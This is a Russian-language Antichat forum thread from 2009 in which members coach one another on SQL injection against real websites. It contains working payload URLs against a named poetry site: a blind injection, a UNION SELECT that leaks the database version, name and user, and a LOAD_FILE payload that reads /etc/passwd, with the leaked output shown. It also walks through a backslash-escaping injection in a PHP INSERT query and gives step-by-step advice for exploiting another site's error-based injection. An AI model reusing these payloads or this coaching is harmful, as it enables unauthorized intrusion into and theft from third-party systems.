HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 14.06.2009, 01:56
Grey
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
С нами: 10483586

Репутация: 5826


По умолчанию

Цитата:
Сообщение от Велемир  
Если кавычка превращается в хтмл сущность оной,пусть инезаметно для меня,то инжект нельзя провести ?
Если кавчка заменяется html сущностями, то это уже не кавычка и ничего ты ею не сделаешь.

P.S. кстати скрипт бажный.

Слеши как я понял не экранируются, можно их заюзать:

* тут немного не правильно написал, см мой пост ниже.

Код:
mysql_query("INSERT INTO main SET title='$ttitle', description='$description', url='$url', cat1='$c1', cat2='0', cat3='0', gin=0, gout=0, moder_vote=0, email='$email', type=0;") or die(mysql_error());
к примеру:
$url = \
$email = cat1='$c1', cat2='0', cat3='0', gin=0, gout=0, moder_vote=0, email=(select version()), type=0; -- 1

Получиться:

Код:
mysql_query("INSERT INTO main SET title='$ttitle', description='$description', url='\', cat1='$c1', cat2='0', cat3='0', gin=0, gout=0, moder_vote=0, email='cat1='$c1', cat2='0', cat3='0', gin=0, gout=0, moder_vote=0, email=(select version()), type=0; -- 1', type=0;") or die(mysql_error());

Последний раз редактировалось Grey; 14.06.2009 в 03:07..
 
Ответить с цитированием

  #2  
Старый 14.06.2009, 01:47
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами: 10470131

Репутация: 142


По умолчанию

Хз,что за ошибка,но посимвольный работает:

http://www.poetryclub.com.ua/author.php?id=2933+and+ascii(substring((select+ver sion()),1,1))%3E=1/*

Обрати внимание на поле Опублiковано
 
Ответить с цитированием

  #3  
Старый 14.06.2009, 01:53
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами: 10585560

Репутация: 1550


По умолчанию

2 TELO
http://www.poetryclub.com.ua/author.php?id=2933+UNION+SELECT+CONCAT(0x3a,versio n(),database(),user())+LIMIT+1,1--

Database Version: 5.0.27
Database name: poetryclub
User name: vobushka@localhost


http://www.poetryclub.com.ua/author.php?id=2933+UNION+SELECT+LOAD_FILE(0x2f6574 632f706173737764)+LIMIT+1,1--

# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $
#
root:*:0:0:Charlie &:/root:/bin/csh bla bla bla

Последний раз редактировалось Gorev; 14.06.2009 в 01:57..
 
Ответить с цитированием

  #4  
Старый 14.06.2009, 02:36
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами: 10470131

Репутация: 142


По умолчанию

Чет я не догнал тему о слешах.Без них никак? Смотрю на твой пример и ничего не понимаю(кроме селект версион()
 
Ответить с цитированием

  #5  
Старый 14.06.2009, 02:52
Grey
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
С нами: 10483586

Репутация: 5826


По умолчанию

Цитата:
Сообщение от Велемир  
Чет я не догнал тему о слешах.Без них никак? Смотрю на твой пример и ничего не понимаю(кроме селект версион()
* в этой мессаге я тебе некоторые вещи цветом пометил.

Ну смотри переменная $ttitle - ей присваиваешь значение '\';
Т.е. слеш.

Код:
mysql_query("INSERT INTO main SET title='$ttitle', description='$description', url='$url', cat1='$c1', cat2='0', cat3='0', gin=0, gout=0, moder_vote=0, email='$email', type=0;") or die(mysql_error());
Получается следующее:

Код:
mysql_query("INSERT INTO main SET title='\', description='$description', url='$url', cat1='$c1', cat2='0', cat3='0', gin=0, gout=0, moder_vote=0, email='$email', type=0;") or die(mysql_error());
Т.е. он экранирует кавычку идущую после него.
Значит она не будет учавствовать в запросе и будет отображаться как текст, до следующей кавычки (в предыдущем примере я ошибся с $email):

Всё между этими кавычками - будет восприниматься как текст и будет значением колонки url.

Код:
mysql_query("INSERT INTO main SET title='\', description='$description', url='$url', cat1='$c1', cat2='0', cat3='0', gin=0, gout=0, moder_vote=0, email='$email', type=0;") or die(mysql_error());
Теперь ты можешь присвоить переменной $description значение и никакие кавычки тебе не помешают.
Предположим значение $description = ', url=0, cat1=0, cat2=0, cat3=0,gin=0, gout=0, moder_vote=0, email={СКЛ инъекция}, type=0; -- '

В запросе будет следующее:

Код:
mysql_query("INSERT INTO main SET title='\', description=', url=0, cat1=0, cat2=0, cat3=0,gin=0, gout=0, moder_vote=0, email={СКЛ инъекция}, type=0; -- ', url='$url', cat1='$c1', cat2='0', cat3='0', gin=0, gout=0, moder_vote=0, email='$email', type=0;") or die(mysql_error());
Отбросим лишее (то, что будет за комментировано):

Код:
mysql_query("INSERT INTO main SET title='\', description=', url=0, cat1=0, cat2=0, cat3=0,gin=0, gout=0, moder_vote=0, email={СКЛ инъекция}, type=0; -- ") or die(mysql_error());
Далее объясню тебе как юзать такую инъекцию:

1. Или смотришь на то, что добавилось в поле email (если верить названию - оно где то должно отображаться).
2. Или юзаешь more than 1 row (ищи статью Електа).

P.S. А вообще вот тебе две статьи, милый, иди и изучай:

Атака на WEB. Миссия невыполнима - а там находишь "[ Фрагментированная SQL-inj ]"
more than 1 row

Последний раз редактировалось Grey; 14.06.2009 в 15:14..
 
Ответить с цитированием

  #6  
Старый 14.06.2009, 11:27
jecka3000
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
С нами: 9555536

Репутация: 95
По умолчанию

на некотором сайте, при подстановки ' выводится следующая ошибка: Tried to print a stacktrace.unknown(0): /chroot/home/comingso/comingsoon.net/nextra/include/net/nexcess/lib/NexDbUtil.php(183): DB Error: syntax error SELECT user_id, status FROM NEX_ARTICLES WHERE article_id = 1'

подскажите, какая именно это уязвимость, к какой СУБД она относится?
 
Ответить с цитированием

  #7  
Старый 14.06.2009, 11:35
wildshaman
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
С нами: 9510146

Репутация: 1550


По умолчанию

Цитата:
Сообщение от jecka3000  
на некотором сайте, при подстановки ' выводится следующая ошибка: Tried to print a stacktrace.unknown(0): /chroot/home/comingso/comingsoon.net/nextra/include/net/nexcess/lib/NexDbUtil.php(183): DB Error: syntax error SELECT user_id, status FROM NEX_ARTICLES WHERE article_id = 1'

подскажите, какая именно это уязвимость, к какой СУБД она относится?
mysql, есть возможность проведения sql инъекции. Преебирай число столбцов (+order+by+...), дальше, если версия не третья, то можно из Бд вытащит данные.
 
Ответить с цитированием

  #8  
Старый 14.06.2009, 11:45
jecka3000
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
С нами: 9555536

Репутация: 95
По умолчанию

wildshaman, смотри, вот кажись подобрал, дальше пытаюсь вытащить юзеров, БД ну и т.д. Но сейчас не выодит ни ошибки ни инфу, которую я хотел бы .......

УРЛ скинул в личку, посмотри плиз...)
 
Ответить с цитированием

  #9  
Старый 14.06.2009, 11:51
Fata1ex
Постоянный
Регистрация: 12.12.2006
Сообщений: 906
С нами: 10216668

Репутация: 930


По умолчанию

Цитата:
если версия не третья, то можно из Бд вытащит данные.
Если третья, то тоже можно, но немного сложнее.
 
Ответить с цитированием

  #10  
Старый 14.06.2009, 12:10
wildshaman
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
С нами: 9510146

Репутация: 1550


По умолчанию

Да, ошибся, там просто сложнее намного, с тройкой не привык еще работать
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.